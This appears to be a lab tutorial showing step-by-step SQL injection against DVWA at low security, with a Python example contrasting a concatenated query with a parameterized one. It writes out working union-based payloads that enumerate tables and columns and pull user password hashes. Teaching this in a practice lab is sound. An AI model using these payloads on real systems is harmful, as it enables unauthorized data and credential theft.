DVWA Low Security SQL Injection Hacking

DVWA (Damn Vulnerable Web Application) lets you practise web application security concepts legally: it is set up on your own machine and lets you choose the level of security you will be breaking.

Those reading this most probably already know what DVWA is, how to host it on your own machine and where to start, so without taking much time we will start with SQL Injection.

How to Setup DVWA Pentest Lab: https://www.ethicalhackx.com/how-to-host-dvwa-pentest-lab-on-wamp-server/
DVWA Brute Force, Low Security: https://www.ethicalhackx.com/dvwa-brute-force-low-security-burp-suite/

DVWA Low Security Setting

First, let's have a look at the code that causes the vulnerability, the reason behind all the injection possibilities. It is better if you figure this out yourself and compare the different versions (low, medium and high security) to find out what the difference is.
Click the view-source button at the bottom right of the SQL Injection page in DVWA to open the source in a new window.

DVWA Low Security SQL Injection Source Code

Step by Step : SQL Injection

I have made a short video showing each of the steps below; check it out.

Step 1: Is the Input Field Vulnerable?

Yes it is, but how do we know that? How do we check?
Send some input to the field and see what output we get. Let's first go with 1.

User Input in Field:
1
DVWA SQL Injection Vulnerable Form Field

The output we got shows: ID, First Name, Last Name.

User Input in Field:
1'
1' in input throws this error page

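The single quote breaks the query and produces an error page, which tells us the input reaches the SQL statement unescaped. The field is vulnerable to SQL Injection, so let's start digging for information.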
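
Why the quote breaks the query, and what the fix looks like, as an added example that is not DVWA's source code: Python with an in-memory SQLite database stands in for DVWA's PHP and MySQL, and the table contents and function names are constructed for illustration. It runs inputs from this page through a concatenated query and through a parameterized one.

```python
import sqlite3

# Constructed sample rows; not DVWA's real data.
ROWS = [
    (1, "Alice", "Example", "placeholder-hash-1"),
    (2, "Bob", "Example", "placeholder-hash-2"),
    (3, "Carol", "Example", "placeholder-hash-3"),
]

def make_db():
    """In-memory stand-in for the users table (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT,"
               " last_name TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", ROWS)
    return db

def lookup_vulnerable(db, user_input):
    """Builds the SQL text by concatenation, the pattern behind the injection."""
    query = ("SELECT first_name, last_name FROM users "
             "WHERE user_id = '" + user_input + "'")
    try:
        return db.execute(query).fetchall()
    except sqlite3.Error as exc:
        # A lone quote leaves the string literal unterminated: syntax error.
        return "SQL error: " + str(exc)

def lookup_parameterized(db, user_input):
    """Binds the input as a value, so it can never change the SQL structure."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(query, (user_input,)).fetchall()

# Inputs taken from this page (the '-- -' comment form works in SQLite too).
PAGE_INPUTS = ["1", "1'", "1' order by 1-- -", "1' or 1=1-- -"]

def compare(db):
    """Returns {input: (vulnerable result, parameterized result)}."""
    return {s: (lookup_vulnerable(db, s), lookup_parameterized(db, s))
            for s in PAGE_INPUTS}

if __name__ == "__main__":
    for text, (bad, good) in compare(make_db()).items():
        print(repr(text), "| concatenated:", bad, "| bound:", good)
```

With the bound parameter, every input other than a plain 1 returns no rows, because the whole string is compared against user_id as a value.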

Step 2: How Many Columns Are There?

We now find out how many columns there are, and we do this with order by.

User Input in Field:
1' order by 1-- -
1' order by 1 #
1' order by 2 #
1' order by 3 #
Finding number of columns

So we have columns 1 and 2, but when we try column 3 we get the error: Unknown column '3' in 'order clause'

Step 3: Fetch the Data

User Input in Field:
1' union select 1,2 #

Step 4: Getting More Details Like Database Name, Version etc.

In 1' union select 1,2 # we can replace the 1 and the 2 with SQL expressions to get the desired output, so we try a few things.

Getting database name:

User Input in Field:
1' union select null,database() #
SQL Injection Hacking : Getting Database name

Getting the database version:

User Input in Field:
1' union select null,version() #
SQL Injection Hacking : Getting Database Version

Getting the user name:

User Input in Field:
1' union select null,user() #
SQL Injection Hacking : Getting User Name

Getting the table names:

User Input in Field:
1' union select null,table_name from information_schema.tables #
SQL Injection Hacking : Getting Table Name

We got a list of the tables present. Any useful information here? When you scroll the page you might find a few very interesting entries like admin, users and USER_PRIVILEGES. It basically depends on what you are looking for. I am happy to dig more into the users table.
NOTE: I have increased the input form field width in a few places to make the input visible; what you see in the screenshots here is not its actual size.

User Input in Field:
1' union select null,table_name from information_schema.tables where table_name like 'user%'#
SQL Injection Hacking : Getting Table Name which are similar to USERS

We have listed the tables which have "user" in their name, like users, users_groups and users_permissions.

Now we get the column names from the users table.

User Input in Field:
1' union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users' #
SQL Injection Hacking : Getting Column Names for USERS Table

This gives us the column names in the users table: user_id, first_name, last_name, user, password, avatar.

User Input in Field:
1' union select null, concat(user_id,0x0a,first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
SQL Injection Hacking : Getting Rows (Data) from Users Table

So we finally got the user details like user_id, first and last name, and password (hash) from the users table.

User Input in Field:
1' or 1=1 #
1' or '1'=1 #
1' or 1=1-- -
DVWA Low Security SQL Injection Hacking

So this was all about DVWA SQL Injection at Low Security. We learnt how we can get details like user names and passwords. The purpose was to show:
How to check if an input field is vulnerable?
How to get table and column names?
How to get the data from the required columns and tables?

In upcoming articles we will do the same with DVWA Medium and High Security, as well as with other vulnerable web application frameworks like bwapp and more.
